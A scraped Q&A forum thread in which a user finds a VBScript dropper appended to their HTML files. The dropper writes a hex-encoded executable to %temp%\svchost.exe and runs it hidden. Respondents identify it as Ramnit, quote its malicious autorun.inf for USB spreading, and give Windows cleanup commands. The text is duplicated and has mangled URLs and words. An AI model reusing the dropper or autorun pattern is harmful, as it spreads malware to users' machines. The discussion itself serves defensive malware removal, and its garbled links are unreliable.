Whenever I open a JavaScript (.js) Or HTML (.html) files after a few days in Notepad++, a similar VB script gets automatically added at the end. I strongly feel that this is some kind of virus, can anyone guide me on this?
</html> // My file ends here......
<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A90000300000004000 ...... {lots of numbers}
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT><!-- .... {Lots of junk characters here } -->
Whenever I open a JavaScript (.js) Or HTML (.html) files after a few days in Notepad++, a similar VB script gets automatically added at the end. I strongly feel that this is some kind of virus, can anyone guide me on this?
</html> // My file ends here......
<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A90000300000004000 ...... {lots of numbers}
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT><!-- .... {Lots of junk characters here } -->
-
1
That looks like a virus appending code to your requests. Possibly your web host, or your ISP if these files are hosted online. It's overwriting your
svchost.exefile, which every service runs under. – Blindy Commented Jul 6, 2015 at 13:02 - 1 Looks a lot like a virus, I get a few result by searching for that number "4D5A90000300000004000". The "number" is the code that will be ran. If you print out what is sent to FileObj.Write you might see the code. – the_lotus Commented Jul 6, 2015 at 13:02
- @Blindy Overwriting svchost.exe sounds scary. – tryingToLearn Commented Jul 6, 2015 at 13:07
-
1
It's downright terrifying, you can do anything afterwards. And it's very hard to manually get rid of since simply starting Windows opens and locks
svchost.exe. Good news is you probably don't need to, there's plenty of antivirus software out there. – Blindy Commented Jul 6, 2015 at 13:09 -
1
Every time I open this page I get a warning from Avast - it identifies the malware as
VBS:Agent-KZ [Trj]- that may help in removing the trojan – Jaromanda X Commented Jul 11, 2015 at 15:53
4 Answers
Reset to default 3The file it runs is %temp%\svchost.exe.
Therefore do a tasklist
tasklist /svc /fi "imagename eq svchost.exe"
make a note of svchosts without any containing services. Put the actual PID in for xxxx
taskkill /pid xxxx /pid xxxx /pid xxxx /f
That will stop that particular part running.
The technique used by the virus won't work reliably especially on non english windows.
Also instead of deleting it change security to prevent execution untill you clean other parts that may exist.
icacls "%temp%\svchost.exe" /deny Everyone:F
This is for Vista but broadly applicable to all versions.
Virus Cleaning
If you have problems doing these in normal mode. Try doing it in Safe Mode with Networking.
Click Start - All Programs - Accessories - Run and type
msconfig
Then go to the Boot tab and click Safe Boot and also tick Network. Reboot. Come back here and untick Safe Boot to return to normal mode.
Safety Scanner
The Microsoft Safety Scanner is a free downloadable security tool that provides on-demand scanning and helps remove viruses, spyware, and other malicious software. It works with your existing antivirus software.
http://www.microsoft./security/scanner/en-au/default.aspx
Malicious Software Removal Tool
If you can't download or run the Safety Scanner, Windows has a tiny anti virus program built in. It only targets the most mon threats. It will want to update, don't let it. Run it without updating. Then run it again updating it this time.
Click Start - All Programs - Accessories - Run (or press Winkey + R). Type
mrt
Reset Firewall
You can reset your firewall to default settings.
Start - All Programs - Accessories - Right click Command Prompt and choose Run As Administrator. Type (or copy and paste by right clicking in the Command Prompt window and choosing Paste).
netsh advfirewall reset export "%userprofile%\desktop\Firewall Settings.wfw"
Security Fixits
Fixits are troubleshooting programs from Microsoft. There are 27 of them.
Automatically fix Windows security settings to keep your PC safe
http://support.microsoft./mats/Malware_Prevention/en-us
and
Fix security issues to protect and secure Windows automatically
http://support.microsoft./mats/windows_security_diagnostic/en-us
and
Fix Internet Explorer issues to make IE fast, safe and stable
http://support.microsoft./mats/ie_performance_and_safety/en-us
For the full list visit
http://support.microsoft./fixit/en-us
When you choose to download it, choose the option to run on another puter. Then you can save it to your harddisk in a folder. Open the folder, open the folder Fix it Portable, and run Launch Fix It. It will contain all 27 Fixits.
Full Time Antivirus
For a permanent anti virus, we here in the forums notice a plete lack of problems for people using Microsoft Security Essentials.
http://www.microsoft./en-au/download/details.aspx?id=5201
If All Else Fails
This program from Microsoft boots another basic operating system to clean Windows. You need to put it on a USB or DVD and then boot from it.
http://windows.microsoft./en-US/windows/what-is-windows-defender-offline
Look Up Detail On The Threat
Microsoft maintains an encyclopedia of virus information.
http://www.microsoft./security/portal/threat/threats.aspx
I also think that your system has affected with some viruses. i want to share a link which i came across that match your question please go through, here i will post the link -->http://www.webdeveloper./forum/showthread.php?287131-VBScript-gets-inserted-automatically-in-HTML-page
I think it is a virus.
So, you need to install antivirus software if you do not have one.
I remend free: Microsoft Security Essentials or Avast.
Also, you could download special Antivirus Utility just for scan and not to installing it – Dr. Web CureIt!
Then make a full scan of your puter.
You should check all startup mands and remove all malicious ones. e.g. CCleaner Free could help you to check them.
UPD
After cleaning and removing startup mands you could use sfc utility.
Microsoft Windows Resource Checker
Scans the integrity of all protected system files and replaces incorrect versions with correct Microsoft versions.
Run cmd with admin privileges and then run sfc /scannow mand.
This is a virus called Win32.Ramnit read the description here:
https://www.virustotal./#/file/fd6c69c345f1e32924f0a5bb7393e191b393a78d58e2c6413b03ced7482f2320/detection
I have just discovered this virus at one of my client's puter and this virus modified all my html files in my USB Portable harddisk.
This script execute the VBScript to create a file and execute it and install a program at this folder:
C:\Program Files\Microsoft\DesktopLayer.exe
read more: http://greatis./blog/how-to-remove-malware/desktoplayer-exe-virus-ramnit.htm
and for every USB pendrive that you inserted into this infected pc, the virus will create 2 files:
autorun.inf
\RECYCLER\<random GUID>\<random charx8>.exe
The content of autorun.inf:
[autorun]
action=Open
icon=%WinDir%\system32\shell32.dll,4
shellexecute=.\RECYCLER\S-0-8-75-3728445372-7281148451-227621134-4236\ZDqdQKMm.exe
shell\explore\mand=.\RECYCLER\S-0-8-75-3728445372-7281148451-227621134-4236\ZDqdQKMm.exe
USEAUTOPLAY=1
shell\Open\mand=.\RECYCLER\S-0-8-75-3728445372-7281148451-227621134-4236\ZDqdQKMm.exe
Which attempt to execute the virus installer when this pendrive is inserted into another puter.